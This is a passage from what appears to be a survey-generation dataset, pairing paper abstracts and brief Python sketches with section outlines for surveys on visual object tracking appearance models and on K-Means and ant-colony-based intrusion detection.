a heuristic negative sample selection scheme is adopted to make the classification more effective. In the tracking procedure, the graph-based learning is embedded into a Bayesian inference framework cascaded with hierarchical motion estimation, which significantly improves the accuracy and efficiency of the localization. Furthermore, an incremental updating technique for the graphs is developed to capture the changes in both appearance and illumination. Experimental results demonstrate that, compared with two state-of-the-art methods, the proposed tracking algorithm is more efficient and effective, especially in dynamically changing and cluttered scenes. --- paper_title: Adaptive Subclass Discriminant Analysis Color Space Learning for Visual Tracking paper_content: A robust tracking method using a subclass discriminant analysis (SDA) color space is presented. The SDA color space is proposed to find the color subspace for representing pixels by maximizing the distance between foreground and background pixels, even if the target and background have multi-modal color distributions. Further, the SDA color space is adaptively updated by only using "confident" target pixels. Experimental results on several challenging videos show the effectiveness of the proposed method.
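As a rough illustration of the discriminative colour-space idea behind the LDA/SDA-based trackers summarised above, the sketch below fits a one-dimensional Fisher (LDA) projection separating foreground from background pixel colours and turns it into a per-pixel confidence map. The sampling of foreground/background pixels and the use of plain LDA (rather than subclass discriminant analysis, or any adaptive update) are simplifying assumptions made for brevity.

```python
import numpy as np
from sklearn.discriminant_analysis import LinearDiscriminantAnalysis


def learn_discriminative_color_model(fg_pixels, bg_pixels):
    """Fit a 1-D Fisher/LDA projection that best separates foreground from
    background pixel colours; both inputs are (n, 3) arrays of RGB samples."""
    X = np.vstack([fg_pixels, bg_pixels]).astype(float)
    y = np.concatenate([np.ones(len(fg_pixels)), np.zeros(len(bg_pixels))])
    lda = LinearDiscriminantAnalysis(n_components=1)
    lda.fit(X, y)
    return lda


def foreground_confidence_map(frame, lda):
    """Per-pixel posterior of belonging to the target; frame is an (H, W, 3) array."""
    h, w, _ = frame.shape
    probs = lda.predict_proba(frame.reshape(-1, 3).astype(float))[:, 1]
    return probs.reshape(h, w)
```

A tracker in the spirit of the papers above would then localise the target at the mode of this confidence map and periodically refit the model with freshly sampled "confident" foreground and background pixels.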
--- paper_title: Bag of Features Tracking paper_content: In this paper, we propose a visual tracking approach based on the "bag of features" (BoF) algorithm. We randomly sample image patches within the object region in training frames to construct two codebooks using RGB and LBP features, instead of only one codebook as in traditional BoF. Tracking is accomplished by searching for the highest similarity between candidates and codebooks. Besides, an updating mechanism and a result refinement scheme are included in BoF tracking. We fuse the patch-based approach and the global template-based approach into a unified framework. Experiments demonstrate that our approach is robust in handling occlusion, scaling and rotation. --- paper_title: On-line Adaption of Class-specific Codebooks for Instance Tracking paper_content: In this work, we demonstrate that an off-line trained class-specific detector can be transformed into an instance-specific detector on-the-fly. To this end, we make use of a codebook-based detector [1] that is trained on an object class. Codebooks model the spatial distribution and appearance of object parts. When matching an image against a codebook, a certain set of codebook entries is activated to cast probabilistic votes for the object. For a given object hypothesis, one can collect the entries that voted for the object. In our case, these entries can be regarded as a signature for the target of interest. Since a change of pose and appearance can lead to an activation of very different codebook entries, we learn the statistics for the target and the background over time, i.e. we learn on-line the probability of each part in the codebook belonging to the target. By taking the target-specific statistics into account for voting, the target can be distinguished from other instances in the background, yielding a higher detection confidence for the target, see Fig. 1. A class-specific codebook as in [1, 2, 3, 4, 5] is trained off-line to identify any instance of the class in any image. It models the probability of the patches belonging to the object class p(c=1|L) and the local spatial distribution of the patches with respect to the object center p(x|c=1,L). For detection, patches are sampled from an image and matched against the codebook, i.e. each patch P(y) sampled from image location y ends at a leaf L(y). The probability for an instance of the class centered at the location x is then given by --- paper_title: People-tracking-by-detection and people-detection-by-tracking paper_content: Both detecting and tracking people are challenging problems, especially in complex real-world scenes that commonly involve multiple people, complicated occlusions, and cluttered or even moving backgrounds. People detectors have been shown to be able to locate pedestrians even in complex street scenes, but false positives have remained frequent. The identification of particular individuals has remained challenging as well. Tracking methods are able to find a particular individual in image sequences, but are severely challenged by real-world scenarios such as crowded street scenes. In this paper, we combine the advantages of both detection and tracking in a single framework. The approximate articulation of each person is detected in every frame based on local features that model the appearance of individual body parts. Prior knowledge on possible articulations and temporal coherency within a walking cycle are modeled using a hierarchical Gaussian process latent variable model (hGPLVM).
We show how the combination of these results improves hypotheses for position and articulation of each person in several subsequent frames. We present experimental results that demonstrate how this allows to detect and track multiple people in cluttered scenes with reoccurring occlusions. --- paper_title: Generalized Kernel-based Visual Tracking paper_content: Kernel-based mean shift (MS) trackers have proven to be a promising alternative to stochastic particle filtering trackers. Despite its popularity, MS trackers have two fundamental drawbacks: 1) the template model can only be built from a single image, and 2) it is difficult to adaptively update the template model. In this paper, we generalize the plain MS trackers and attempt to overcome these two limitations. It is well known that modeling and maintaining a representation of a target object is an important component of a successful visual tracker. However, little work has been done on building a robust template model for kernel-based MS tracking. In contrast to building a template from a single frame, we train a robust object representation model from a large amount of data. Tracking is viewed as a binary classification problem, and a discriminative classification rule is learned to distinguish between the object and background. We adopt a support vector machine for training. The tracker is then implemented by maximizing the classification score. An iterative optimization scheme very similar to MS is derived for this purpose. Compared with the plain MS tracker, it is now much easier to incorporate online template adaptation to cope with inherent changes during the course of tracking. To this end, a sophisticated online support vector machine is used. We demonstrate successful localization and tracking on various data sets. --- paper_title: Generative versus discriminative methods for object recognition paper_content: Many approaches to object recognition are founded on probability theory, and can be broadly characterized as either generative or discriminative according to whether or not the distribution of the image features is modelled. Generative and discriminative methods have very different characteristics, as well as complementary strengths and weaknesses. In this paper we introduce new generative and discriminative models for object detection and classification based on weakly labelled training data. We use these models to illustrate the relative merits of the two approaches in the context of a data set of widely varying images of non-rigid objects (animals). Our results support the assertion that neither approach alone will be sufficient for large scale object recognition, and we discuss techniques for combining them. --- paper_title: Visual Tracker Using Sequential Bayesian Learning: Discriminative, Generative, and Hybrid paper_content: This paper presents a novel solution to track a visual object under changes in illumination, viewpoint, pose, scale, and occlusion. Under the framework of sequential Bayesian learning, we first develop a discriminative model-based tracker with a fast relevance vector machine algorithm, and then, a generative model-based tracker with a novel sequential Gaussian mixture model algorithm. Finally, we present a three-level hierarchy to investigate different schemes to combine the discriminative and generative models for tracking. 
The presented hierarchical model combination contains the learner combination (at level one), classifier combination (at level two), and decision combination (at level three). The experimental results with quantitative comparisons performed on many realistic video sequences show that the proposed adaptive combination of discriminative and generative models achieves the best overall performance. Qualitative comparison with some state-of-the-art methods demonstrates the effectiveness and efficiency of our method in handling various challenges during tracking. --- paper_title: Combining Generative and Discriminative Methods for Pixel Classification with Multi-Conditional Learning paper_content: It is possible to broadly characterize two approaches to probabilistic modeling in terms of generative and discriminative methods. Provided with sufficient training data the discriminative approach is expected to yield superior accuracy as compared to the analogous generative model since no modeling power is expended on the marginal distribution of the features. Conversely, if the model is accurate the generative approach can perform better with less data. In general it is less vulnerable to overfitting and allows one to more easily specify meaningful priors on the model parameters. We investigate multi-conditional learning - a method combining the merits of both approaches. Through specifying a joint distribution over classes and features we derive a family of models with analogous parameters. Parameter estimates are found by optimizing an objective function consisting of a weighted combination of conditional log-likelihoods. Systematic experiments in the context of foreground/background pixel classification with the Microsoft-Berkeley segmentation database using mixtures of factor analyzers illustrate tradeoffs between classifier complexity, the amount of training data and generalization accuracy. We show experimentally that this approach can lead to models with better generalization performance than purely generative or discriminative approaches --- paper_title: Identifying individuals in video by combining 'generative' and discriminative head models paper_content: The objective of this work is automatic detection and identification of individuals in unconstrained consumer video, given a minimal number of labelled faces as training data. Whilst much work has been done on (mainly frontal) face detection and recognition, current methods are not sufficiently robust to deal with the wide variations in pose and appearance found in such video. These include variations in scale, illumination, expression, partial occlusion, motion blur, etc. We describe two areas of innovation: the first is to capture the 3-D appearance of the entire head, rather than just the face region, so that visual features such as the hairline can be exploited. The second is to combine discriminative and 'generative' approaches for detection and recognition. Images rendered using the head model are used to train a discriminative tree-structured classifier giving efficient detection and pose estimates over a very wide pose range with three degrees of freedom. Subsequent verification of the identity is obtained using the head model in a 'generative' framework. 
We demonstrate excellent performance in detecting and identifying three characters and their poses in a TV situation comedy --- paper_title: Tracking Nonstationary Visual Appearances by Data-Driven Adaptation paper_content: Without any prior about the target, the appearance is usually the only cue available in visual tracking. However, in general, the appearances are often nonstationary which may ruin the predefined visual measurements and often lead to tracking failure in practice. Thus, a natural solution is to adapt the observation model to the nonstationary appearances. However, this idea is threatened by the risk of adaptation drift that originates in its ill-posed nature, unless good data-driven constraints are imposed. Different from most existing adaptation schemes, we enforce three novel constraints for the optimal adaptation: (1) negative data, (2) bottom-up pair-wise data constraints, and (3) adaptation dynamics. Substantializing the general adaptation problem as a subspace adaptation problem, this paper presents a closed-form solution as well as a practical iterative algorithm for subspace tracking. Extensive experiments have demonstrated that the proposed approach can largely alleviate adaptation drift and achieve better tracking results for a large variety of nonstationary scenes. --- paper_title: Online learning of probabilistic appearance manifolds for video-based recognition and tracking paper_content: This paper presents an online learning algorithm to construct from video sequences an image-based representation that is useful for recognition and tracking. For a class of objects (e.g., human faces), a generic representation of the appearances of the class is learned off-line. From video of an instance of this class (e.g., a particular person), an appearance model is incrementally learned on-line using the prior generic model and successive frames from the video. More specifically, both the generic and individual appearances are represented as an appearance manifold that is approximated by a collection of sub-manifolds (named pose manifolds) and the connectivity between them. In turn, each sub-manifold is approximated by a low-dimensional linear sub-space while the connectivity is modeled by transition probabilities between pairs of sub-manifolds. We demonstrate that our online learning algorithm constructs an effective representation for face tracking, and its use in video-based face recognition compares favorably to the representation constructed with a batch technique. --- paper_title: Online tracking and reacquisition using co-trained generative and discriminative trackers paper_content: Visual tracking is a challenging problem, as an object may change its appearance due to viewpoint variations, illumination changes, and occlusion. Also, an object may leave the field of view and then reappear. In order to track and reacquire an unknown object with limited labeling data, we propose to learn these changes online and build a model that describes all seen appearance while tracking. To address this semi-supervised learning problem, we propose a co-training based approach to continuously label incoming data and online update a hybrid discriminative generative model. The generative model uses a number of low dimension linear subspaces to describe the appearance of the object. In order to reacquire an object, the generative model encodes all the appearance variations that have been seen. 
A discriminative classifier is implemented as an online support vector machine, which is trained to focus on recent appearance variations. The online co-training of this hybrid approach accounts for appearance changes and allows reacquisition of an object after total occlusion. We demonstrate that under challenging situations, this method has strong reacquisition ability and robustness to distracters in background. --- paper_title: Point matching under large image deformations and illumination changes paper_content: To solve the general point correspondence problem in which the underlying transformation between image patches is represented by a homography, a solution based on extensive use of first order differential techniques is proposed. We integrate in a single robust M-estimation framework the traditional optical flow method and matching of local color distributions. These distributions are computed with spatially oriented kernels in the 5D joint spatial/color space. The estimation process is initiated at the third level of a Gaussian pyramid, uses only local information, and the illumination changes between the two images are also taken into account. Subpixel matching accuracy is achieved under large projective distortions significantly exceeding the performance of any of the two components alone. As an application, the correspondence algorithm is employed in oriented tracking of objects. --- paper_title: Incremental Learning for Robust Visual Tracking paper_content: Visual tracking, in essence, deals with non-stationary image streams that change over time. While most existing algorithms are able to track objects well in controlled environments, they usually fail in the presence of significant variation of the object's appearance or surrounding illumination. One reason for such failures is that many algorithms employ fixed appearance models of the target. Such models are trained using only appearance data available before tracking begins, which in practice limits the range of appearances that are modeled, and ignores the large volume of information (such as shape changes or specific lighting conditions) that becomes available during tracking. In this paper, we present a tracking method that incrementally learns a low-dimensional subspace representation, efficiently adapting online to changes in the appearance of the target. The model update, based on incremental algorithms for principal component analysis, includes two important features: a method for correctly updating the sample mean, and a forgetting factor to ensure less modeling power is expended fitting older observations. Both of these features contribute measurably to improving overall tracking performance. Numerous experiments demonstrate the effectiveness of the proposed tracking algorithm in indoor and outdoor environments where the target objects undergo large changes in pose, scale, and illumination. ---
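The incremental-subspace idea used by trackers such as the one in the last abstract can be sketched as follows: vectorised target observations are folded into a low-dimensional PCA basis as tracking proceeds, and candidate windows are scored by their reconstruction error under that basis. This is a simplified stand-in built on scikit-learn's IncrementalPCA; the original method's exact mean update and forgetting factor are not reproduced here.

```python
import numpy as np
from sklearn.decomposition import IncrementalPCA


class SubspaceAppearanceModel:
    """Simplified incremental-subspace appearance model for tracking.

    New target observations are folded into a low-dimensional PCA basis with
    partial_fit; candidate windows are scored by (negative) reconstruction
    error, so that windows well explained by the subspace score highest.
    """

    def __init__(self, n_components=16):
        self.pca = IncrementalPCA(n_components=n_components)
        self.fitted = False

    def update(self, patches):
        """patches: (n, d) vectorised target observations; each partial_fit call
        needs n >= n_components, so observations are buffered into small batches."""
        self.pca.partial_fit(patches)
        self.fitted = True

    def score(self, candidates):
        """Negative reconstruction error for each (d,)-vectorised candidate row."""
        if not self.fitted:
            return np.zeros(len(candidates))
        recon = self.pca.inverse_transform(self.pca.transform(candidates))
        return -np.sum((candidates - recon) ** 2, axis=1)
```

In a particle-filter setting, these scores would typically be exponentiated into observation likelihoods, which is how generative subspace models of this kind are usually plugged into the Bayesian tracking frameworks discussed in the surrounding references.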
Title: A Survey of Appearance Models in Visual Object Tracking
Section 1: INTRODUCTION
Description 1: Discuss the main goals of computer vision, the importance of visual object tracking, its applications, and challenges.
Section 2: Overview of Visual Object Tracking
Description 2: Describe the basic components of a visual object tracking system, including object initialization, appearance modeling, motion estimation, and object localization.
Section 3: Challenges in Developing Robust Appearance Models
Description 3: Identify the challenges in visual object tracking such as low-quality camera inputs, nonrigid object tracking, real-time processing requirements, and variations in object appearance.
Section 4: ORGANIZATION OF THIS SURVEY
Description 4: Explain the organization and structure of the survey, including the two main focus areas: visual representation and statistical modeling.
Section 5: Main Differences from Other Related Surveys
Description 5: Compare and contrast this survey with other related surveys in the field of visual object tracking, highlighting the unique contributions and focus areas.
Section 6: Contributions of this Survey
Description 6: Summarize the key contributions of the survey in reviewing literature on visual representations and statistical modeling schemes.
Section 7: Global Visual Representation
Description 7: Detail various global visual representation techniques including raw pixel representation, optical flow, histograms, and more.
Section 8: Local Feature-Based Visual Representation
Description 8: Discuss different local feature-based representations like SIFT, MSER, SURF, and corner features.
Section 9: Discussion on Global and Local Visual Representations
Description 9: Compare and contrast the strengths and weaknesses of global and local visual representation techniques.
Section 10: STATISTICAL MODELING FOR TRACKING-BY-DETECTION
Description 10: Discuss the role of statistical modeling in tracking-by-detection and classify the models into generative, discriminative, and hybrid categories.
Section 11: Mixture Generative Appearance Models
Description 11: Explain mixture generative appearance models like WSL mixture models and Gaussian mixture models.
Section 12: Kernel-Based Generative Appearance Models (KGAMs)
Description 12: Describe kernel-based generative models and their different branches including color-driven, shape-integration, and scale-aware models.
Section 13: Subspace Learning-Based Generative Appearance Models (SLGAMs)
Description 13: Discuss subspace learning techniques for visual object tracking, including linear and nonlinear subspace models.
Section 14: Boosting-Based Discriminative Appearance Models
Description 14: Present boosting-based discriminative models and their learning strategies, categorized into self-learning and co-learning models.
Section 15: SVM-Based Discriminative Appearance Models (SDAMs)
Description 15: Explain SVM-based discriminative models, focusing on their kernel selection and self-learning versus co-learning strategies.
Section 16: Randomized Learning-Based Discriminative Appearance Models (RLDAMs)
Description 16: Introduce randomized learning techniques like Random Forest and their application in visual object tracking.
Section 17: Discriminant Analysis-Based Discriminative Appearance Models (DADAMs)
Description 17: Discuss discriminant analysis techniques for supervised subspace learning and their applications in tracking.
Section 18: Codebook Learning-Based Discriminative Appearance Models (CLDAMs) Description 18: Explain how codebooks are constructed for capturing dynamic appearance information from foreground and background. Section 19: Hybrid Generative-Discriminative Appearance Models (HGDAMs) Description 19: Discuss hybrid models that combine the strengths of generative and discriminative models in single-layer or multilayer combinations. Section 20: BENCHMARK RESOURCES FOR VISUAL OBJECT TRACKING Description 20: Provide information on available resources for evaluating the performance of tracking algorithms, including datasets, ground truth, and comparative evaluations. Section 21: CONCLUSION AND FUTURE DIRECTIONS Description 21: Summarize the key findings and suggest future research directions, addressing issues like robustness vs accuracy, 2D/3D information fusion, intelligent vision models, and low-frame-rate tracking.
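Several of the representations listed above (the histograms of Section 7, the color-driven kernel models of Section 12) boil down to comparing a color histogram of the tracked template with that of a candidate region. A small, hedged illustration of that building block follows; the bin count and the Bhattacharyya similarity are common choices rather than the recipe of any single surveyed tracker.

```python
import numpy as np

def color_histogram(patch, bins=8):
    """Quantized RGB histogram of an image patch (H x W x 3, values in [0, 1])."""
    idx = np.clip((patch * bins).astype(int), 0, bins - 1)
    flat = idx[..., 0] * bins * bins + idx[..., 1] * bins + idx[..., 2]
    hist = np.bincount(flat.ravel(), minlength=bins ** 3).astype(float)
    return hist / hist.sum()

def bhattacharyya(p, q):
    """Similarity between two normalized histograms (1.0 means identical)."""
    return float(np.sum(np.sqrt(p * q)))

# Toy usage: compare a reference template with a slightly shifted candidate region.
rng = np.random.default_rng(1)
frame = rng.random((120, 160, 3))
template = color_histogram(frame[40:80, 60:100])
candidate = color_histogram(frame[42:82, 63:103])
print(bhattacharyya(template, candidate))
```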
Intrusion Detection based on K-Means Clustering and Ant Colony Optimization: A Survey
6
--- paper_title: High-Performance Intrusion Detection Using OptiGrid Clustering and Grid-Based Labelling paper_content: This research aims to construct a high-performance anomaly based intrusion detection system. Most of past studies of anomaly based IDS adopt k-means based clustering, this paper points out that the following reasons cause performance degradation of k-means based clustering when it is deployed in real traffic environment. First, k-means based algorithms have weakness for high dimensional data. Second, in spite of non-hyper spherical distribution of normal traffic in a feature space, these algorithms can only create hyper spherical clusters. Furthermore, unsophisticated algorithms to label clusters cannot achieve high detection performance. In order to solve these issues, this paper proposes a modification of OptiGrid clustering and a cluster labelling algorithm using grids. OptiGrid has robust ability to high dimensional data. Our labelling algorithm divides the feature space into grids and labels clusters using the density of grids. The combination of these two algorithms enables a system to extract the feature of traffic data and classifies the data as attack or normal correctly. We have implemented our system and confirmed efficiency of our system by utilizing both KDDCUP1999 data sets and Kyoto 2006+ data sets. --- paper_title: Using a Dynamic K-means Algorithm to Detect Anomaly Activities paper_content: IDS (Intrusion Detection system) is an active and driving defense technology. This paper mainly focuses on intrusion detection based on clustering analysis. The aim is to improve the detection rate and decrease the false alarm rate. A modified dynamic K-means algorithm called MDKM to detect anomaly activities is proposed and corresponding simulation experiments are presented. Firstly, the MDKM algorithm filters the noise and isolated points on the data set. Secondly by calculating the distances between all sample data points, we obtain the high-density parameters and cluster-partition parameters, using dynamic iterative process we get the k clustering center accurately, then an anomaly detection model is presented. This paper used KDD CUP 1999 data set to test the performance of the model. The results show the system has a higher detection rate and a lower false alarm rate, it achieves expectant aim. --- paper_title: Intrusion detection based on K-Means clustering and Naïve Bayes classification paper_content: Intrusion Detection System (IDS) plays an effective way to achieve higher security in detecting malicious activities for a couple of years. Anomaly detection is one of intrusion detection system. Current anomaly detection is often associated with high false alarm with moderate accuracy and detection rates when it's unable to detect all types of attacks correctly. To overcome this problem, we propose an hybrid learning approach through combination of K-Means clustering and Naive Bayes classification. The proposed approach will be cluster all data into the corresponding group before applying a classifier for classification purpose. An experiment is carried out to evaluate the performance of the proposed approach using KDD Cup'99 dataset. Result show that the proposed approach performed better in term of accuracy, detection rate with reasonable false alarm rate. 
--- paper_title: Network programming and mining classifier for intrusion detection using probability classification paper_content: In conventional network security simply relies on mathematical algorithms and low counter measures to taken to prevent intrusion detection system, although most of this approaches in terms of theoretically challenged to implement. Therefore, a variety of algorithms have been committed to this challenge. Instead of generating large number of rules the evolution optimization techniques like Genetic Network Programming (GNP) can be used. The GNP is based on directed graph, In this paper the security issues related to deploy a data mining-based IDS in a real time environment is focused upon. We generalize the problem of GNP with association rule mining and propose a fuzzy weighted association rule mining with GNP framework suitable for both continuous and discrete attributes. Our proposal follows an Apriori algorithm based fuzzy WAR and GNP and avoids pre and post processing thus eliminating the extra steps during rules generation. This method can sufficient to evaluate misuse and anomaly detection. Experiments on KDD99Cup and DARPA98 data show the high detection rate and accuracy compared with other conventional method. --- paper_title: Anomaly Intrusion Detection Method Based on K-Means Clustering Algorithm with Particle Swarm Optimization paper_content: K-means clustering algorithm is an effective method that has been proved for apply to the intrusion detection system. Particle swarm optimization (PSO) algorithm which is evolutionary computation technology based on swarm intelligence has good global search ability. With the deficiency of global search ability for K-means clustering algorithm, we propose a K-means clustering algorithm based on particle swarm optimization (PSO-KM) in this paper. The proposed algorithm has overcome falling into local minima and has relatively good overall convergence. Experiments on data sets KDD CUP 99 has shown the effectiveness of the proposed method and also shows the method has higher detection rate and lower false detection rate. --- paper_title: Intrusion detection based on K-Means clustering and Naïve Bayes classification paper_content: Intrusion Detection System (IDS) plays an effective way to achieve higher security in detecting malicious activities for a couple of years. Anomaly detection is one of intrusion detection system. Current anomaly detection is often associated with high false alarm with moderate accuracy and detection rates when it's unable to detect all types of attacks correctly. To overcome this problem, we propose an hybrid learning approach through combination of K-Means clustering and Naive Bayes classification. The proposed approach will be cluster all data into the corresponding group before applying a classifier for classification purpose. An experiment is carried out to evaluate the performance of the proposed approach using KDD Cup'99 dataset. Result show that the proposed approach performed better in term of accuracy, detection rate with reasonable false alarm rate. --- paper_title: Ant Algorithms for Discrete Optimization paper_content: This article presents an overview of recent work on ant algorithms, that is, algorithms for discrete optimization that took inspiration from the observation of ant colonies' foraging behavior, and introduces the ant colony optimization (ACO) metaheuristic. 
In the first part of the article the basic biological findings on real ants are reviewed and their artificial counterparts as well as the ACO metaheuristic are defined. In the second part of the article a number of applications of ACO algorithms to combinatorial optimization and routing in communications networks are described. We conclude with a discussion of related work and of some of the most important aspects of the ACO metaheuristic. --- paper_title: Intrusion detection based on K-Means clustering and Naïve Bayes classification paper_content: Intrusion Detection System (IDS) plays an effective way to achieve higher security in detecting malicious activities for a couple of years. Anomaly detection is one of intrusion detection system. Current anomaly detection is often associated with high false alarm with moderate accuracy and detection rates when it's unable to detect all types of attacks correctly. To overcome this problem, we propose an hybrid learning approach through combination of K-Means clustering and Naive Bayes classification. The proposed approach will be cluster all data into the corresponding group before applying a classifier for classification purpose. An experiment is carried out to evaluate the performance of the proposed approach using KDD Cup'99 dataset. Result show that the proposed approach performed better in term of accuracy, detection rate with reasonable false alarm rate. --- paper_title: MINING LUNG CANCER DATA AND OTHER DISEASES DATA USING DATA MINING TECHNIQUES: A SURVEY paper_content: If you think about the dangerous diseases in the world then you always list Cancer as one. Lung cancer is one of the most dangerous cancer types in the world. These diseases can spread by uncontrolled cell growth in tissues of the lung. Early detection can save the life and survivability of the patients. In this paper we survey several aspects of data mining which is used for lung cancer prediction. Data mining is useful in lung cancer classification. We also survey the aspects of ant colony optimization (ACO) technique. Ant colony optimization helps in increasing or decreasing the disease prediction value. This study assorted data mining and ant colony optimization techniques for appropriate rule generation and classification, which pilot to exact cancer classification. In addition to, it provides basic framework for further improvement in medical diagnosis.
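The ACO references above share one core loop: candidate solutions are sampled from pheromone values, pheromone evaporates, and the best solution is reinforced. The toy sketch below applies that generic recipe to a binary feature-selection problem; the function, its parameters, and the objective are invented for illustration and do not reproduce any of the cited algorithms.

```python
import numpy as np

def aco_select_features(score, n_features, n_ants=10, n_iters=30, rho=0.1, seed=0):
    """Tiny ACO loop over binary feature-selection strings; score(mask) is 'higher is better'."""
    rng = np.random.default_rng(seed)
    tau = np.full(n_features, 0.5)               # pheromone: desirability of including feature i
    best_mask, best_val = None, -np.inf
    for _ in range(n_iters):
        masks = rng.random((n_ants, n_features)) < tau   # each ant samples a candidate subset
        vals = np.array([score(m) for m in masks])
        i = vals.argmax()
        if vals[i] > best_val:
            best_mask, best_val = masks[i], vals[i]
        tau = (1 - rho) * tau + rho * masks[i]   # evaporation plus reinforcement of the iteration best
        tau = np.clip(tau, 0.05, 0.95)
    return best_mask, best_val

# Toy objective: prefer subsets close to {0, 2, 4}.
target = np.array([1, 0, 1, 0, 1, 0], dtype=bool)
mask, val = aco_select_features(lambda m: -np.sum(m ^ target), n_features=6)
```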
--- paper_title: Extraction of Significant Patterns from Heart Disease Warehouses for Heart Attack Prediction paper_content: Summary The diagnosis of diseases is a significant and tedious task in medicine. The detection of heart disease from various factors or symptoms is a multi-layered issue which is not free from false presumptions often accompanied by unpredictable effects. Thus the effort to utilize knowledge and experience of numerous specialists and clinical screening data of patients collected in databases to facilitate the diagnosis process is considered a valuable option. The healthcare industry gathers enormous amounts of heart disease data that regrettably, are not “mined” to determine concealed information for effective decision making by healthcare practitioners. In this paper, we have proposed an efficient approach for the extraction of significant patterns from the heart disease warehouses for heart attack prediction. Initially, the data warehouse is preprocessed to make it appropriate for the mining process. After preprocessing, the heart disease warehouse is clustered using the K-means clustering algorithm, which will extract the data relevant to heart attack from the warehouse. Subsequently the frequent patterns are mined from the extracted data, relevant to heart disease, using the MAFIA algorithm. Then the significant weightage of the frequent patterns are calculated. Further, the patterns significant to heart attack prediction are chosen based on the calculated significant weightage. These significant patterns can be used in the development of heart attack prediction system. --- paper_title: A multiagent system using associate rule mining (ARM), a Collaborative filtering approach paper_content: Agent Oriented Programming (AOP) is a recent promising software paradigm that brings concepts from the theories of artificial intelligence into the mainstream realm of distributed systems, and yet it is rather difficult to find a successful application of agent oriented system (specifically) when large-scale systems are considered. When adopting an agent-oriented approach to solve a problem, there are a number of domain independent issues that must always be solved, such as how to model agent behavior to predict future action and how to allow agents to communicate rather than expecting developers to develop this core infrastructure themselves. In our paper, we address several problems that exist in a socialized e-learning environment and provide solutions to these problems through smart and collaborative agent behavior modeling which learn and adapt themselves through prior experiences, thereby assisting in successful implementation of this large scale e-learning system. In this paper, the author (s) proposes an implementation of a complete distributed e-learning system based on Collaborative filtering (CF) method. The system has intelligent collaborative filtering based tutoring system (ICFTS) capabilities that allow contents, presentation and navigation to be adapted according to the learner's requirements. In order to achieve that development, two concepts were put together: multi-agent systems and data mining techniques (specifically, the ARM algorithm). All the implementation code is developed using MATLAB GUI environment. To our best knowledge, very few literatures discusses a portion of e-learning environment using adaptive software agents, but none of the current literatures addresses a complete implementation of their learning system in detail. 
The goal of the paper is to implement one such multi-agent based e-learning system which learns from its prior user experiences on top of an agent-oriented middleware that provides the domain-independent infrastructure, allowing the developers to focus on building the key logic behind it. In this system, the agents follow an adaptive cognitive learning approach, where the agent learns through user behaviors via a collaborative filtering technique, or experiencing and then processing and remembering the information in an e-learning environment. The paper will utilize agent (a piece of code) based environment in our e-learning system using ARM [1][2]. The paper follows a learning approach based cognitive domain of Bloom's Taxonomy such as Analyze, Evaluate, Create, Apply, understand and remember. --- paper_title: Probable Sequence Determination Using Incremental Association Rule Mining and Transaction Clustering paper_content: Many organizations collect information about customers which are used to support various business related task. The detail of the customers and their behavior is stored in the database. Here we propose a method of using incremental updating technique to mine direct association rules Inter & Intra transactions. Cluster analysis is performed to verify the associated objects fall in nominal cluster. The result of this technique can be used to develop well structured e-shop which facilitate the customer by helping him to find what he wants in a specialized way and also aids him to choose the associated products by the method of prediction. Thus it reduces the workload of marketing professional to provide direct marketing and thereby providing customer satisfaction. --- paper_title: Apriori and Ant Colony Optimization of Association Rules paper_content: Association Rule mining is one of the important and most popular data mining technique. Association rule mining can be efficiently used in any decision making processor decision based rule generation. In this paper we present an efficient mining based optimization techniques for rule generation. By using apriori algorithm we find the positive and negative association rules. Then we apply ant colony optimization algorithm (ACO) for optimizing the association rules. Our results show the effectiveness of our approach. --- paper_title: A formal immune network and its implementation for on-line intrusion detection paper_content: This paper presents a mathematical model of immune network specified for real-time intrusion detection. A software implementation of the model has been tested on data simulating a typical US Air Force local area network (LAN). The obtained results suggest that the performance of the model is unachievable for other approaches of computational intelligence. A hardware implementation of the model is proposed based on digital signal processor (DSP) of super Harvard architecture (SHARC). --- paper_title: Intrusion detection based on K-Means clustering and Naïve Bayes classification paper_content: Intrusion Detection System (IDS) plays an effective way to achieve higher security in detecting malicious activities for a couple of years. Anomaly detection is one of intrusion detection system. Current anomaly detection is often associated with high false alarm with moderate accuracy and detection rates when it's unable to detect all types of attacks correctly. To overcome this problem, we propose an hybrid learning approach through combination of K-Means clustering and Naive Bayes classification. 
The proposed approach will be cluster all data into the corresponding group before applying a classifier for classification purpose. An experiment is carried out to evaluate the performance of the proposed approach using KDD Cup'99 dataset. Result show that the proposed approach performed better in term of accuracy, detection rate with reasonable false alarm rate. ---
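The recurring K-Means plus Naive Bayes abstract describes clustering the data before classification. One plausible reading of that two-stage layout, shown below on synthetic stand-in data rather than KDD Cup'99, is to fit a separate Naive Bayes model inside each cluster; this is an assumed arrangement for illustration, not the authors' exact procedure.

```python
import numpy as np
from sklearn.cluster import KMeans
from sklearn.naive_bayes import GaussianNB

# Stand-in data: rows are connection records, y is 0 = normal, 1 = attack.
rng = np.random.default_rng(0)
X = np.vstack([rng.normal(0, 1, (200, 5)), rng.normal(3, 1, (60, 5))])
y = np.array([0] * 200 + [1] * 60)

# Stage 1: group the records into k clusters.
km = KMeans(n_clusters=3, n_init=10, random_state=0).fit(X)

# Stage 2: one Naive Bayes classifier per cluster; a new record is routed
# to its nearest cluster and classified by that cluster's model.
models = {c: GaussianNB().fit(X[km.labels_ == c], y[km.labels_ == c]) for c in range(3)}

def predict(x):
    c = int(km.predict(x.reshape(1, -1))[0])
    return int(models[c].predict(x.reshape(1, -1))[0])

print(predict(X[0]), predict(X[-1]))
```

With this layout each per-cluster model only has to separate the traffic that falls into its own region of feature space, which is the intuition the hybrid approach appeals to.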
Title: Intrusion Detection based on K-Means Clustering and Ant Colony Optimization: A Survey
Section 1: Literature Survey
Description 1: This section discusses the various research works on intrusion detection, including the methods and results reported by different authors.
Section 2: Problem Domain
Description 2: This section identifies the gaps and challenges in traditional intrusion detection approaches, highlighting the need for improved hybrid systems.
Section 3: Analysis
Description 3: This section provides a comparative analysis of different research works to identify the areas where detection mechanisms perform weakly.
Section 4: Optimized Association
Description 4: This section explains the role of association rule mining in detecting patterns, how it can be optimized, and its applications in different sectors.
Section 5: Proposed Work
Description 5: This section describes the proposed approach for intrusion detection using K-Means clustering combined with Ant Colony Optimization, including an illustrative example and methodology.
Section 6: Conclusion and Future Work
Description 6: This section summarizes the findings, discusses the advantages and disadvantages of various techniques, and proposes future research directions for enhancing intrusion detection systems.
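Section 4 of this outline rests on association rule mining; the helpers below compute the two standard rule metrics, support and confidence, on toy symbolic "audit event" transactions invented for the example.

```python
def support(transactions, itemset):
    """Fraction of transactions containing every item in `itemset`."""
    s = set(itemset)
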